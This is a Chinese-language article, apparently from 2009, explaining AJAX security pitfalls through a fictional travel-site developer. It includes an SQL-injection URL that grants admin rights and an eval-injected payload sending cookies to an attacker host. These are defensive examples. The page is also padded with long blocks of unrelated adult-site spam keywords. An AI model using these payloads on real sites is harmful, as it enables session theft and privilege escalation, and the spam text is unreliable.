国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

AJAX也有安全隱患 談談AJAX的安全性
2009-01-03   

Web開發者不會注意到由 “AJAX(Asynchronous JavaScript And XML)”所帶來的激情。不費力氣就能創建像Google Suggest那樣的智能網站或者像Gmail那樣基于Web的應用程序,這在很大程度上要歸功于這種技術。然而,伴隨著AJAX應用程序的發展,我們發現了它的一些不足之處,我們發現它的安全漏洞也在逐漸變大,就像慢慢地把基于AJAX的站點放入了一顆定時炸彈中。

AJAX的好處

在當年“Web應用程序”的美好時代,事情非常簡單。你填寫了一個表單,點擊“提交”按鈕,然后當前屏幕就消失了,等待一小會兒后你就轉入到了下一個頁面。今天的狀況已經不是這樣的了,用戶需要的是一種就像任何桌面應用程序那樣流暢、快捷和人性化的Web體驗。

AJAX經常是和DHTML(Dynamic HTML)一起協作的,它的順利執行需要允許網頁中的JavaScript代碼和web服務器在后臺無縫通訊。比方說,當你開始在Google Suggest的搜索框中輸入東西時,web頁面就和服務器在后臺開始交換數據,然后會給出一些你可能需要的詞條等。所有的這一切都不需要頁面刷新或者按下任何按鈕。同樣這也就是像Gmail那樣的應用程序怎么能對實時拼寫檢查做的那么好的原因。

AJAX怎樣工作

AJAX復雜的原理已經超出了今天所要闡述的范圍,這里只簡單描述一下。你的頁面上的JavaScript代碼能夠在不依賴于用戶的情況下和你的Web服務器取得聯系。這里面起核心作用的就是JavaScript的XMLHttpRequest對象,這個對象能夠被就像用戶敲擊鍵盤或者時鐘事件在后臺或者異步觸發(也就是術語異步JavaScript和XML)。

如果你在Google Suggest中輸入“ajax”后,就會得到像我輸入后得到的服務器請求一樣:

1. www.google.com/complete/search?hl=en&js=true&qu=aj

2. www.google.com/complete/search?hl=en&js=true&qu=aja

3. www.google.com/complete/search?hl=en&js=true&qu=ajax

在這個術語中的XML部分有一點會引起人們的誤解,其實這一部分是沒有任何意義的。它是從JavaScript對象得來的名字,同時許多AJAX風格的應用程序使用了XML,這個對象能夠就任何事務向服務器發出一個請求。甚至JavaScript代碼本身也能夠被取回和評估。繼續完成我的輸入“ajax example”,將會從Google的服務器產生下面的回應:

sendRPCDone(frameElement, "ajax example", new Array("ajax example", "ajax examples"), new Array("153,000 results", "177,000 results"), new Array(""));

這將會給你一些關于強大的AJAX的暗示吧,它具有在運行中(on the fly)把新的JavaScript代碼加入到瀏覽器中的能力。然而,最優化的方法看起來好像束縛了XML協定。舉個例子說明一下,比如Google產生了下面的這個東西:

ajax example

153,000

ajax examples

177,000

顯然,你可以在一個合適的表單中解釋這些XML數據,但我們要感謝JavaScript,它確實能夠在一些非常典型的限制條件下和大量討厭的IE bug環境里非常好的處理XML對象。

為了幫助你理解一些Ajax的問題,我在這里給你介紹一個假想的旅行公司-“時代尖端旅行公司”。由于受到AJAX bug的推動,他們的主要web開發者Max Uptime為了創建一個這樣的應用程序,他決定混合使用AJAX,這樣,他走在時代尖端了。

AJAX的問題

半數以上的AJAX安全風險來自隱含在服務器中的漏洞。顯然,使用安全編碼技術的好的設計,對于更安全的AJAX大有幫助,我們需要感謝Max熟悉開放萬維網應用安全計劃(the Open Web Application Security Project - OWASP)排名前十的最嚴重web應用程序安全漏洞列表(www.owasp.org)。不幸的是,當Max實現AJAX的時候,他仍然需要面對許多額外的因素:

1.新的技術:如果Max想把他的站點連接到一個SQL數據庫,他在Google查到了數百萬的例子。AJAX技術,不管這種技術有多年輕,它仍然是出現在采購循環中相對較早的,盡管它只有很少一部分好的例子出現在網絡上。為了解決一些難處理的和不必要的復雜問題,這就要求像Max那樣的開發者去自主開發。Max也就不得不編寫服務器端和客戶端的代碼,創建他自己不太確定的協議(特別是對服務器響應來講)。不管這些協議有多好,都將會及時表現在頁面上。

2.非傳統方式的設計:AJAX有一點點不同于傳統設計方式,因為這樣的應用程序是半客戶端半服務端的。在Max的例子里,他是唯一的開發者,所以他為服務端和客戶端都能夠進行編碼。在同一時間使用兩種不同的語言(特別是在早期階段)進行開發將會產生一些初級的編碼錯誤,因為他要在兩端來回跳躍,對一端來講非常好,但可能在另一端不能夠勝任。即使Max有一個大的開發團隊,安全編碼責任也可能在服務端和客戶端開發小組之間代碼移交的時候發生問題。

3.太多的腳本語言:Max憑借他自己的聰明才智決定建立世界上最優秀的旅行登記工具。你從輸入你現在的位置(通過郵政編碼、電話區號或者GPS等等)開始登記,這時候一個AJAX請求就會被立即發送來確定你確切的位置。從那時候開始,屏幕上就會填入你所有可以利用的旅行方式,這一切甚至都是在你決定你想要去什么地方、你打算什么時候動身和你打算和誰一同去之前就完成的。

這個屏幕上的單元格和控件都充滿了AJAX驅動,服務器端和客戶端的腳本可能需要超過20個不同的服務器調用。你可以想像一個很小的個體服務器程序,比如findairportsbylocation.aspx 或者 determinemaxbaggageallowancebyairline.php.

顯而易見,如果沒有Max的仔細計劃(比如創建多功能的“重載”JavaScript函數和服務器腳本),每一次設計他都需要創建超過40個獨立的部分。更多的編程意味著會產生更多的錯誤和bug,意味著需要更多的時間去編寫、管理、測試和更新代碼。不僅如此,因為在客戶端的JavaScript代碼中應用了大量的這種腳本,他們在正式的程序測試中也容易變得很健忘。

4.確定小部分的AJAX不會引起危害:這個站點是一個計劃出行的站點,但是Max考慮的是它將立刻為你提供一個顯示精確位置的衛星視圖,并且把你所要到達目的地的天氣情況也提供給你。AJAX最大的誘惑之一看起來好像是直到最后一刻它還在進行其它的操作,就像一個講解員在那里解說一樣,為了AJAX使用了AJAX。當Max開始嘗試他的新想法時,他會逐漸嘗試增加更多新的功能,完全忽視測試的需要。

5.不安全的通訊:每一個AJAX調用可能只回傳很少數量的數據給客戶端,但那些數據是私有的、保密的。Max可以編寫一個便利的工具來對你的信用卡號碼進行數字校驗,但是如果使用純文本代替over SSL進行發送數據會怎樣呢?這是一個顯而易見的問題,但是當有許多例行程序需要考慮,特別是屏幕上其它99%的數據不是真正的機密數據時,很容易就會忽視掉SSL的。

6.服務器端訪問控制:使用JavaScript程序來觸發AJAX經常會掩飾一些顯而易見的編碼錯誤,服務器端訪問控制就是一個例子。假設Max想參考你上次游覽的一個詳細目的地來為你提供你中意的旅館,他可能會是像下面這樣:

showprevioushotels.aspx?userid=12345&destination=UK

這當然是非常好的,但是如果一個惡意用戶把URL改成了如下所示該怎么辦呢:

showprevioushotels.aspx?userid=12346&destination=%

他們會得到其他人最喜愛的旅館嗎?(注意:%在SQL語句中是通配符)。無疑,這是一個沒有什么危害的例子,但是Max應該使用session、cookie或者其它符號形式來確保數據能并且只能發送到正確的用戶那里。它們可能僅僅是數據的一小部分,但它們可能就是最重要的一小部分。

7.服務器端驗證:實際上這里有兩個問題。第一,AJAX控制經常被用來在用戶最后提交到服務器之前的輸入驗證。這麻痹了Max,使Max有一種虛假的安全感,原因是他建立了稱作alloweddestinations.php的函數,根據用戶的ID來決定他們能夠到達的正確目的地。

因為這是一個服務器端的檢查,當這個頁面最后被提交的時候他不必再次為在服務器上做檢查而煩惱,這里我們假定不會有惡意的用戶暗中破壞從alloweddestinations.php的響應或者破壞對服務器最后的請求。

AJAX控制可以比用戶自己更仔細驗證用戶的輸入,但是他們還是經常在服務器上最后做一次驗證。

AJAX驗證的第二個問題就是控制本身會受到驗證漏洞的影響。這里再次強調一下,URL通常是隱藏著的,所以也會經常忘掉它。舉例說明一下,也許我可以使用SQL Injection來對剛才的腳本進行攻擊,如下所示:

showprevioushostels.aspx?userid='; update users set type='admin' where userid=12345;--

就會讓我登錄后具有系統管理員的權限。當然,如何取得那些表名(table)和字段名已經超出了本文討論的范圍,但是你已經了解這種情況了,不是嗎?

8.客戶端驗證:我們已經知道在剛才的Google Suggest例子中,通過簡單評測服務端的響應后動態創建和執行JavaScript函數是可行的。如果沒有任何形式的驗證(如果這樣的話在客戶端很難保證可靠性和流暢性),客戶端將僅僅簡單執行服務器需要它完成的事情。

這樣的話,由于真正的代碼怎么執行的對于一個普通用戶來講是永遠看不到的(也就是說你不能夠“查看源文件”),于是潛在地為惡意的黑客們打開了一個完全的攻擊導向。如果服務器的響應持續不斷地被搗亂(這種破壞行為可能是在Web服務器本身也可能是在數據傳輸過程中),這種攻擊將很難被發現。

Max使用下面的響應在目的地網頁上更新天氣圖標,他是用的函數是eval();函數:

updateWeatherIcon('cloudy.gif');

然而,惡意的cracker能夠把這個函數變成下面的形式,這樣要發現這種攻擊就更加困難了:

updateWeatherIcon('www.myhackingsite.ru/grab.aspx?c=' + document.cookies); updateWeatherIcon('cloudy.gif');

我們現在能夠在我們自己的服務器上跟蹤每一個用戶的session ID/cookie。

小結

毫無疑問,AJAX和AJAX-style技術都是通向web設計的光明大道。開發者可以在web上創造出以前從所未有的真正的“應用程序”,使用AJAX必須小心謹慎,這樣才能夠保證web站點的安全。

然而,最大的威脅之一,來自日益復雜的使用AJAX的客戶端腳本和服務器端腳本。這些腳本被技術手段隱藏在了視線之外,使測試很不直觀;同時,這種新技術看起來也使web開發者忘掉了基本的好的編碼方式。就像訪問控制和輸入校驗這樣的問題也不會消失,它們變得更多更復雜了。

為了取得成功,你必須從好的計劃開始。必須集中你的才智減少和簡化AJAX調用,創建一個標準的響應格式,在任何地方都要遵循這個協定(理想的XML)。

遵循來自像開放萬維網應用安全計劃那樣的站點的最優方法。這里面特別包含了訪問控制和輸入校驗漏洞檢查,同時確保敏感信息使用over SSL勝過使用普通文本。

永遠不要假設服務器端AJAX對于訪問控制或者用戶輸入校驗檢查能夠代替在服務器上的最終再檢查。增加AJAX控制永遠不會減少你的驗證工作量,它們只能增加你的工作量。

永遠不要假設客戶端的混淆技術(obfuscation,在這里指使JavaScript難于閱讀和解碼)能夠保護你非常重要的商業秘密。使用JavaScript是隱藏程序設計最沒用的一種手段,還能夠為你的對手提供好處。

最后,你必須非常好的領導你的開發團隊。使用AJAX聽起來非常引人注目,但是你應該認識到要保留你的開發團隊以便開發版本2,當然現在你應該開發非常穩定的版本1。


熱詞搜索:

上一篇:信息安全僅有保護是不夠的
下一篇:用rsync對網站進行鏡像備份

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美电影精品一区二区| 亚洲综合视频网| 欧美在线观看一二区| 色婷婷综合久久| 欧美精品v国产精品v日韩精品| 欧美理论片在线| 日韩有码一区二区三区| 久久99精品久久久久婷婷| 国产一区二区在线观看视频| 99久久综合国产精品| 日本大香伊一区二区三区| 久久久不卡网国产精品一区| 日韩美女久久久| 免费观看一级特黄欧美大片| 岛国av在线一区| 欧美日韩夫妻久久| 中文字幕制服丝袜一区二区三区| 亚洲国产日韩av| 国产suv精品一区二区三区| 制服丝袜成人动漫| 亚洲精品综合在线| 国产福利一区在线| 26uuu国产在线精品一区二区| 亚洲乱码国产乱码精品精小说| 欧美日韩高清一区二区三区| 激情综合五月天| 一区二区三区在线观看国产| 不卡的看片网站| 久久久久久久精| 日本韩国一区二区三区| 亚洲成av人片www| 日韩av午夜在线观看| 欧美婷婷六月丁香综合色| 午夜精品久久久久久久99水蜜桃| 91福利国产精品| 中文字幕第一区二区| 精品一区精品二区高清| 色8久久人人97超碰香蕉987| 亚洲va在线va天堂| 欧美日韩精品一区二区在线播放| 精品少妇一区二区三区在线视频| 亚洲精品欧美二区三区中文字幕| 亚洲欧美另类久久久精品2019| 国产成人亚洲综合a∨婷婷| 一区二区三区小说| 国产精品理伦片| 久久综合久久鬼色| 7777精品伊人久久久大香线蕉| av在线播放一区二区三区| 精品亚洲成av人在线观看| 天天操天天色综合| 亚洲国产日韩一区二区| 一区二区三区欧美日| 亚洲黄色尤物视频| 亚洲老司机在线| 一级精品视频在线观看宜春院| 国产精品传媒视频| 亚洲男人的天堂在线aⅴ视频| 国产精品欧美久久久久一区二区| 91在线码无精品| 亚洲一区二区黄色| 亚洲精品成人a在线观看| 中文字幕一区二区三区四区 | 成人夜色视频网站在线观看| 蜜臀av性久久久久av蜜臀妖精| 久久久久久一二三区| 日韩精品中文字幕在线一区| 日韩亚洲欧美在线| 99久久综合色| 色就色 综合激情| 欧美日韩成人一区二区| 欧美精品在线观看一区二区| 欧美男男青年gay1069videost| 欧美男男青年gay1069videost| 91精品麻豆日日躁夜夜躁| 欧美日本乱大交xxxxx| 日韩你懂的电影在线观看| 精品国产乱码久久久久久免费 | 国产精品乱码一区二三区小蝌蚪| 欧美激情一区不卡| 亚洲影院在线观看| 老司机午夜精品99久久| 亚洲国产欧美在线人成| 久久精品99久久久| 粉嫩aⅴ一区二区三区四区五区| 91年精品国产| 激情另类小说区图片区视频区| 亚洲天堂网中文字| 天天操天天色综合| 国产成人精品网址| 欧美午夜精品一区二区蜜桃| 日韩美女在线视频| 综合亚洲深深色噜噜狠狠网站| 日韩高清中文字幕一区| 国产91精品露脸国语对白| 欧美亚日韩国产aⅴ精品中极品| 精品国产乱码久久久久久浪潮| 中文字幕在线视频一区| 日韩精品高清不卡| jiyouzz国产精品久久| 日韩欧美一二区| 夜夜嗨av一区二区三区中文字幕 | 欧美性大战久久| 欧美电影免费观看高清完整版在 | 久久综合国产精品| 一区二区成人在线| 高清在线不卡av| 欧美一级精品在线| 亚洲综合清纯丝袜自拍| 懂色av中文一区二区三区| 884aa四虎影成人精品一区| 亚洲免费在线观看视频| 国产成人av网站| 精品成人免费观看| 日本欧美一区二区| 欧美专区亚洲专区| 亚洲视频小说图片| 成人精品鲁一区一区二区| 日韩美女一区二区三区四区| 亚洲成av人影院| 色老汉av一区二区三区| 亚洲激情图片小说视频| 97久久超碰精品国产| 国产精品高清亚洲| 成人av网站在线观看免费| 久久精品夜色噜噜亚洲a∨| 国产蜜臀av在线一区二区三区| 中文字幕电影一区| 国产福利电影一区二区三区| 欧美大片顶级少妇| 黄一区二区三区| 欧美精品一区二区三区视频| 奇米一区二区三区| 日韩你懂的电影在线观看| 美女一区二区在线观看| 91麻豆精品国产91久久久| 视频一区视频二区中文| 欧美一区三区四区| 欧美高清视频www夜色资源网| 亚洲乱码中文字幕综合| 色哟哟精品一区| 伊人婷婷欧美激情| 欧美三级日韩在线| 欧美激情一区三区| 99久久久无码国产精品| 亚洲视频在线一区| 欧美久久一二区| 韩国精品在线观看| 国产精品视频免费看| 色偷偷久久一区二区三区| 亚洲午夜一区二区| 欧美变态tickle挠乳网站| 国产精品99久久久| 欧美一区二区三区免费视频| 久久国产精品色| 欧美国产一区二区在线观看| 波多野结衣在线一区| 亚洲综合区在线| 久久亚洲影视婷婷| 成年人国产精品| 日韩激情一区二区| 国产日产亚洲精品系列| 91丨porny丨国产入口| 亚洲va在线va天堂| 欧美激情在线看| 9191成人精品久久| 成人性生交大片免费看中文网站| 一区二区三区小说| 久久影院视频免费| 欧美主播一区二区三区美女| 精品一区二区三区在线视频| 国产精品国产自产拍高清av| 欧美精品aⅴ在线视频| jlzzjlzz欧美大全| 久久91精品久久久久久秒播| 亚洲激情图片小说视频| 久久久久88色偷偷免费| 欧美日韩在线播放三区| 盗摄精品av一区二区三区| 蜜臀av一区二区在线免费观看| 中文字幕一区二区在线播放| 日韩欧美久久久| 欧美中文一区二区三区| 99九九99九九九视频精品| 久久国产成人午夜av影院| 亚洲国产成人精品视频| 亚洲三级电影网站| 国产色产综合色产在线视频| 欧美一区二区三区性视频| 欧美亚洲国产bt| 欧美高清一级片在线| 国产不卡视频一区| 韩国三级中文字幕hd久久精品| 亚洲大片免费看| 一区二区三区四区高清精品免费观看 | 亚洲欧洲无码一区二区三区| 精品三级av在线| 日韩女优制服丝袜电影| 欧美精品免费视频| 欧美日韩日本视频|